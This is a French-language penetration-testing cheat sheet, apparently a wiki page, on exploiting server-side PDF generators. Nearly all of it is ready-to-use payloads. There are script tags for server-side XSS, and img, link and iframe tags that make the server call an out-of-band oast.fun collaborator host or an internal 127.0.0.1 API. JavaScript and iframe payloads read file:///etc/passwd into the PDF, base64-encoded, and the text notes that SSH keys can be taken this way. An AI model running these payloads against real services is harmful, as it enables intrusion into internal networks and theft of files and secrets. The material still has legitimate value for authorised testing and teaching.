Exploitation of PDF Generation Vulnerabilities

Injection de Javascript:

Comme pour les injections XSS, il est possible d'injection du code javascript qui sera interprété lors de la génération du pdf, c'est ce qu'on nomme une Server-Side XSS

<script>document.write('test1')</script>

Après l'injection de cette payload, si test1 apparait sur le PDF alors il est possible de réaliser des Server-Side XSS.

On peut tenter d'autre injection :

<script>document.write(window.location)</script>

Server-Side Request Forgery

Une des vulnérabilités les plus courantes lors de la génération de PDF est le Server-Side Request Forgery (SSRF). Les documents HTML chargent souvent des ressources externes comme des feuilles de style ou des images, ce qui oblige le serveur à envoyer des requêtes vers ces sources pour les récupérer. En injectant du code HTML dans l’entrée du générateur de PDF, il devient possible de forcer le serveur à envoyer une requête GET vers n’importe quelle URL, y compris celles de ses applications internes.

Pour confirmer cette vulnérabilité, on peut injecter différents tags HTML, comme une balise img pointant vers une URL sous notre contrôle.

<img src="http://<burp_collaborator>.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://<burp_collaborator>.oast.fun/ssrftest2" >
<iframe src="http://<burp_collaborator>.oast.fun/ssrftest3"></iframe>
<iframe src="http://127.0.0.1:8080/api/users" width="800" height="500"></iframe>

Local File inclusion

Du fait qu'on puisse exécuter du code javascript il est possible de leverage ceci pour avoir une LFI et ainsi tenter de lire de fichier :

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Cependant, cette méthode est impraticable pour certains fichiers, car copier les données d'un fichier PDF peut l'endommager. Par exemple, la syntaxe risque de se briser si l'on exfiltre une clé SSH. De plus, il est impossible d'exfiltrer des fichiers contenant des données binaires de cette manière. Il est donc préférable de convertir le fichier en base64 avec la fonction btoa avant de l'insérer dans le PDF.

<script>
	function addNewlines(str) {
		var result = '';
		while (str.length > 0) {
		    result += str.substring(0, 100) + '\n';
			str = str.substring(100);
		}
		return result;
	}

	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(addNewlines(btoa(this.responseText)))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Si l'exécution de code javascript n'est pas possible pour lire des fichiers, il est possible d'avoir le contenu de celui avec des tags HTML :

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

PreviousIntroduction to PDF Generation Vulnerabilities NextIntroduction to NoSQL Injection

Last updated 5 months ago

<img src="http://<burp_collaborator>.oast.fun/ssrftest1"/> <link rel="stylesheet" href="http://<burp_collaborator>.oast.fun/ssrftest2" > <iframe src="http://<burp_collaborator>.oast.fun/ssrftest3"></iframe> <iframe src="http://127.0.0.1:8080/api/users" width="800" height="500"></iframe>

<script> function addNewlines(str) { var result = ''; while (str.length > 0) { result += str.substring(0, 100) + '\n'; str = str.substring(100); } return result; } x = new XMLHttpRequest(); x.onload = function(){ document.write(addNewlines(btoa(this.responseText))) }; x.open("GET", "file:///etc/passwd"); x.send(); </script>